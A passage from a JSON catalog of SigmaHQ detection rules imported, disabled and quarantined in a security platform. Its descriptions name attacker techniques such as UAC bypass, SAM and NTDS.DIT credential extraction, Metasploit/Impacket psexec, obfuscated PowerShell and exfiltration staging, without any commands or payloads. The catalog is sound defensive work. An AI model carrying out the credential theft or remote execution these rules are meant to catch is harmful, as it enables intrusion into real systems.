It will run a binary file contained in a low-privilege registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-wsreset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ea3bf32-9680-422d-9f50-e90716b12a66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" } }, { "id": "sigmahq-sigma-6ea858a8-ba71-4a12-b2cc-5d83312404c7", "type": "detection", "name": "HackTool - Typical HiveNightmare SAM File Export", "description": "Detects files written by the different tools that exploit HiveNightmare", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-typical-hivenightmare-sam-file-export.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml" } }, { "id": "sigmahq-sigma-6ec820f2-e963-4801-9127-d8b2dce4d31b", 
"type": "detection", "name": "APT User Agent", "description": "Detects suspicious user agent strings used in APT malware in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/apt-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ec820f2-e963-4801-9127-d8b2dce4d31b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_apt.yml" } }, { "id": "sigmahq-sigma-6ec86d9e-912e-4726-91a2-209359b999b9", "type": "detection", "name": "Amsi.DLL Loaded Via LOLBIN Process", "description": "Detects loading of \"Amsi.dll\" by a living-off-the-land process. 
This could be an indication of a \"PowerShell without PowerShell\" attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/amsi-dll-loaded-via-lolbin-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ec86d9e-912e-4726-91a2-209359b999b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" } }, { "id": "sigmahq-sigma-6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "type": "detection", "name": "OMIGOD SCX RunAsProvider ExecuteScript", "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. 
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1190", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/omigod-scx-runasprovider-executescript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" } }, { "id": "sigmahq-sigma-6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "type": "detection", "name": "Potentially Suspicious Child Process Of Regsvr32", "description": "Detects potentially suspicious child processes of \"regsvr32.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-regsvr32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" } }, { "id": "sigmahq-sigma-6f156c48-3894-4952-baf0-16193e9067d2", "type": "detection", "name": "CodeIntegrity - Blocked Image Load With Revoked Certificate", "description": "Detects blocked image load events with revoked certificates by code integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-blocked-image-load-with-revoked-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f156c48-3894-4952-baf0-16193e9067d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml" } }, { "id": "sigmahq-sigma-6f1a11aa-4b8a-4b7f-9e13-4d3e4ff0e0d4", "type": "detection", "name": "WSL Kali-Linux Usage", "description": "Detects the use of Kali Linux through Windows Subsystem for Linux", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wsl-kali-linux-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f1a11aa-4b8a-4b7f-9e13-4d3e4ff0e0d4", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_usage.yml" } }, { "id": "sigmahq-sigma-6f3e2987-db24-4c78-a860-b4f4095a7095", "type": "detection", "name": "Files Added To An Archive Using Rar.EXE", "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/files-added-to-an-archive-using-rar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f3e2987-db24-4c78-a860-b4f4095a7095", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rar_compress_data.yml" } }, { "id": "sigmahq-sigma-6f4191bb-912b-48a8-9ce7-682769541e6d", "type": "detection", "name": "Suspicious Msiexec Execute Arbitrary DLL", "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msiexec-execute-arbitrary-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f4191bb-912b-48a8-9ce7-682769541e6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" } }, { "id": "sigmahq-sigma-6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "type": "detection", "name": "Import LDAP Data Interchange Format File Via Ldifde.EXE", "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". This can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/import-ldap-data-interchange-format-file-via-ldifde-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" } }, { "id": "sigmahq-sigma-6f583da0-3a90-4566-a4ed-83c09fe18bbf", "type": "detection", "name": "Account Created And Deleted Within A Close Time Frame", "description": 
"Detects when an account was created and deleted in a short period of time.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-created-and-deleted-within-a-close-time-frame.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml" } }, { "id": "sigmahq-sigma-6f7e1c10-2dc9-4312-adb6-9574ff09a5c8", "type": "detection", "name": "Cisco Duo Successful MFA Authentication Via Bypass Code", "description": "Detects when a successful MFA authentication occurs due to the use of a bypass code.\nA bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as \"backup codes,\" so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) 
or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-duo-successful-mfa-authentication-via-bypass-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f7e1c10-2dc9-4312-adb6-9574ff09a5c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/cisco_duo/cisco_duo_mfa_bypass_via_bypass_code.yml" } }, { "id": "sigmahq-sigma-6f8b3439-a203-45dc-a88b-abf57ea15ccf", "type": "detection", "name": "HackTool - CrackMapExec PowerShell Obfuscation", "description": "The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings that are detected by this rule.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-powershell-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" } }, { "id": "sigmahq-sigma-6fb63b40-e02a-403e-9ffd-3bcc1d749442", "type": "detection", "name": "Metasploit Or Impacket Service Installation Via SMB PsExec", "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1570", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/metasploit-or-impacket-service-installation-via-smb-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" } }, { "id": "sigmahq-sigma-6fb77778-040f-4015-9440-572aa9b6b580", "type": "detection", "name": "Ingress/Egress Security Group Modification", "description": "Detects when an account makes changes to the ingress or egress rules of a security group.\nThis can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ingress-egress-security-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6fb77778-040f-4015-9440-572aa9b6b580", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml" } }, { "id": "sigmahq-sigma-6fe4aa1e-0531-4510-8be2-782154b73b48", "type": "detection", "name": "File Recovery From Backup Via Wbadmin.EXE", "description": "Detects the recovery of files from backups via \"wbadmin.exe\".\nAttackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-recovery-from-backup-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6fe4aa1e-0531-4510-8be2-782154b73b48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml" } }, { "id": "sigmahq-sigma-6ff08e55-ea53-4f27-94a1-eff92e6d9d5c", "type": "detection", "name": "System Information Discovery Via Sysctl - MacOS", "description": "Detects the execution of \"sysctl\" with specific arguments that 
have been used by threat actors and malware. It provides system hardware information.\nThis process is primarily used to detect and avoid virtualization and analysis environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.001", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-via-sysctl-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ff08e55-ea53-4f27-94a1-eff92e6d9d5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml" } }, { "id": "sigmahq-sigma-7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "type": "detection", "name": "Potential Mpclient.DLL Sideloading Via Defender Binaries", "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mpclient-dll-sideloading-via-defender-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml" } }, { "id": "sigmahq-sigma-700fb7e8-2981-401c-8430-be58e189e741", "type": "detection", "name": "Suspicious Package Installed - Linux", "description": "Detects installation of suspicious packages using system installation utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-package-installed-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "700fb7e8-2981-401c-8430-be58e189e741", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_install_suspicious_packages.yml" } }, { "id": "sigmahq-sigma-7021255e-5db3-4946-a8b9-0ba7a4644a69", "type": "detection", "name": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG", "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-provisioning-registry-key-abuse-for-binary-proxy-execution-reg.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7021255e-5db3-4946-a8b9-0ba7a4644a69", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml" } }, { "id": "sigmahq-sigma-7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" } }, { "id": "sigmahq-sigma-7047d730-036f-4f40-b9d8-1c63e36d5e62", "type": "detection", "name": "Potential Binary Or Script Dropper Via PowerShell", "description": "Detects PowerShell creating a binary executable or a script file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-binary-or-script-dropper-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml" } }, { "id": "sigmahq-sigma-705072a5-bb6f-4ced-95b6-ecfa6602090b", "type": "detection", "name": "WebDav Put Request", "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webdav-put-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "705072a5-bb6f-4ced-95b6-ecfa6602090b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_http_webdav_put_request.yml" } }, { "id": "sigmahq-sigma-7050bba1-1aed-454e-8f73-3f46f09ce56a", "type": "detection", "name": "Cloudflared Tunnel Connections Cleanup", "description": "Detects execution of the \"cloudflared\" tool with the tunnel \"cleanup\" flag in order to cleanup tunnel connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1102", "T1090", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-tunnel-connections-cleanup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7050bba1-1aed-454e-8f73-3f46f09ce56a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml" } }, { "id": "sigmahq-sigma-707e097c-e20f-4f67-8807-1f72ff4500d6", "type": "detection", "name": "Potential Persistence Via App Paths Default Property", "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to prepend information to the PATH environment variable on a per-application, per-process basis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-app-paths-default-property.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml" } }, { "id": "sigmahq-sigma-7090adee-82e2-4269-bd59-80691e7c6338", "type": "detection", "name": "Console CodePage Lookup Via CHCP", "description": "Detects use of chcp to look up the system locale value as part of host discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1614.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/console-codepage-lookup-via-chcp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7090adee-82e2-4269-bd59-80691e7c6338", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml" } }, { "id": "sigmahq-sigma-7091372f-623c-4293-bc37-20c32b3492be", "type": "detection", "name": "End User Consent Blocked", "description": "Detects when end user consent is blocked due to risk-based consent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/end-user-consent-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7091372f-623c-4293-bc37-20c32b3492be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml" } }, { "id": "sigmahq-sigma-70ad0861-d1fe-491c-a45f-fa48148a300d", "type": "detection", "name": "File Download via CertOC.EXE", "description": "Detects when a user downloads a file by using CertOC.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70ad0861-d1fe-491c-a45f-fa48148a300d", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_download.yml" } }, { "id": "sigmahq-sigma-70ad982f-67c8-40e0-a955-b920c2fa05cb", "type": "detection", "name": "Suspicious IO.FileStream", "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-io-filestream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "source_commit": "df5c6a6", "license": 